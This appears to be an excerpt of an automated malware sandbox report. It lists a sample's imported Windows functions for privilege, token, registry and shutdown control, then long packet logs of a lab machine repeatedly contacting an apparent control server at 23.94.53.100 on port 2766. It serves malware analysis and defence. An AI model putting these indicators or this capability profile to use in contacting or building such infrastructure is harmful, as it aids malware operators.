GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
              May 2, 2024 15:09:59.304474115 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.304486036 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.304544926 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.304544926 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.304600000 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.307801962 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.307815075 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.307873964 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.307954073 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.308022022 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.308115959 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.308129072 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.308175087 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.308278084 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.308290005 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.308374882 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.308433056 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.308445930 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.308491945 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.308602095 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.308768988 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.308779955 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.308793068 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.308815956 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.308840036 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.309880972 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.309973001 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.310038090 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.310041904 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.310127020 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.310169935 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.310211897 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.310292959 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.310333014 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.310379028 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.310461044 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.310503006 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.310539961 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.310703039 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.310749054 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.310798883 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.310897112 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.310952902 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.310972929 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.312995911 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.313050032 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.313354969 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.313446045 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.313499928 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.313519001 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.313628912 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.313683987 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.313724041 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.313898087 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.313954115 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.314074039 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.314153910 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.314207077 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.314227104 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.314302921 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.314321995 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.314347029 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.314378023 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.314414978 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.315556049 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.315623999 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.315665007 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.315679073 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.315742016 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.315787077 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.315962076 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.316196918 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.316243887 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.316256046 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.316312075 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.316366911 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.316376925 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.316487074 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.316556931 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.316572905 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.316633940 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.316673994 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.316693068 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.318532944 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.318625927 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.318635941 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.318694115 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.318747997 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.318773985 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.318875074 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.318917990 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.318944931 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.319016933 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.319056034 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.319097042 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.319133043 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.319179058 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.319199085 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.319303036 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.319344997 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.319405079 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.319494009 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.319549084 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.322479010 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.322551966 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.322616100 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.322634935 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.322676897 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.322731972 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.322747946 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.322788954 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.322835922 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.322840929 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.358704090 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.358777046 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.358856916 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.405283928 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.409588099 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.409611940 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.409674883 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.409684896 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.409722090 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.409780979 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.409789085 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.409825087 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.409883976 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.409887075 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.409946918 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410018921 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.410023928 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410130024 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410176992 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.410204887 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410355091 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410398006 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410434008 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.410445929 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410491943 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410501003 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.410562992 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410602093 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.410619020 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410660982 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410715103 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410728931 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.410787106 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410844088 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410860062 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.410861015 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410916090 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.410921097 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.410984039 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411027908 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411037922 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.411076069 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411125898 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411140919 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.411272049 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411310911 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.411324024 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411369085 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411420107 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411451101 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.411581039 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411626101 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.411647081 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411705017 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411752939 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.411760092 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411813021 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411871910 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411890030 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.411928892 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411978006 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.411984921 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.412026882 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.412080050 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.412089109 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.412158012 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:09:59.412203074 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:09:59.978053093 CEST8049709178.237.33.50192.168.2.6
              May 2, 2024 15:09:59.982393980 CEST4970980192.168.2.6178.237.33.50
              May 2, 2024 15:10:04.413955927 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:04.467639923 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:04.898091078 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:04.952138901 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:05.500241995 CEST27664970723.94.53.100192.168.2.6
              May 2, 2024 15:10:05.545789957 CEST497072766192.168.2.623.94.53.100
              May 2, 2024 15:10:05.667411089 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:05.733278990 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:06.955909967 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:06.961618900 CEST497072766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.054976940 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.067209959 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.067277908 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.067281961 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.067321062 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.067384005 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.067399979 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.067435980 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.067488909 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.067563057 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.067608118 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.067627907 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.067683935 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.067718983 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.067785978 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.067869902 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.067905903 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.067965031 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068022966 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068067074 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.068085909 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068151951 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068186998 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.068259001 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068345070 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068386078 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.068408966 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068448067 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068480015 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.068516016 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068537951 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068572044 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.068614960 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068646908 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068690062 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.068720102 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068783045 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068818092 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.068833113 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068890095 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.068924904 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.068967104 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069000006 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069031954 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.069056988 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069116116 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069152117 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.069195032 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069241047 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069272995 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.069312096 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069386005 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069420099 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.069444895 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069546938 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069582939 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.069677114 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069751978 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069786072 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.069794893 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069837093 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069885015 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.069900036 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069952965 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.069988012 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.070012093 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070051908 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070086002 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.070127964 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070198059 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070233107 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.070240974 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070307970 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070343018 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070343018 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.070390940 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070427895 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.070502043 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070602894 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070635080 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.070652962 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070707083 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070740938 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.070785046 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070873976 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.070909023 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.070977926 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.071053982 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.071089983 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.071146011 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.071196079 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.071230888 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.071254969 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.071343899 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.071365118 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.071381092 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.071451902 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.071484089 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.071669102 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.072139978 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.072175026 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.072247982 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.072721004 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.072757959 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.072803974 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.072851896 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.072885990 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.072910070 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.072964907 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.072997093 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.073036909 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.073060989 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.073092937 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.073112965 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.073498964 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.073534012 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.073575974 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.073620081 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.073657036 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.073715925 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.073769093 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.073802948 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.073822021 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.073877096 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.073911905 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.073920012 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.073971033 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.074004889 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.074172020 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.074244022 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.074279070 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.074285984 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.074350119 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.074389935 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.074417114 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.074461937 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.074501038 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.074567080 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.074625015 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.074644089 CEST27664970823.94.53.100192.168.2.6
              May 2, 2024 15:10:07.074661970 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.123909950 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:07.130009890 CEST27664970723.94.53.100192.168.2.6
              May 2, 2024 15:10:14.159898996 CEST497072766192.168.2.623.94.53.100
              May 2, 2024 15:10:14.159979105 CEST497082766192.168.2.623.94.53.100
              May 2, 2024 15:10:14.171282053 CEST4970980192.168.2.6178.237.33.50
              May 2, 2024 15:10:16.024542093 CEST497162766192.168.2.623.94.53.100
              May 2, 2024 15:10:16.134370089 CEST27664971623.94.53.100192.168.2.6
              May 2, 2024 15:10:16.137749910 CEST497162766192.168.2.623.94.53.100
              May 2, 2024 15:10:17.323556900 CEST497162766192.168.2.623.94.53.100
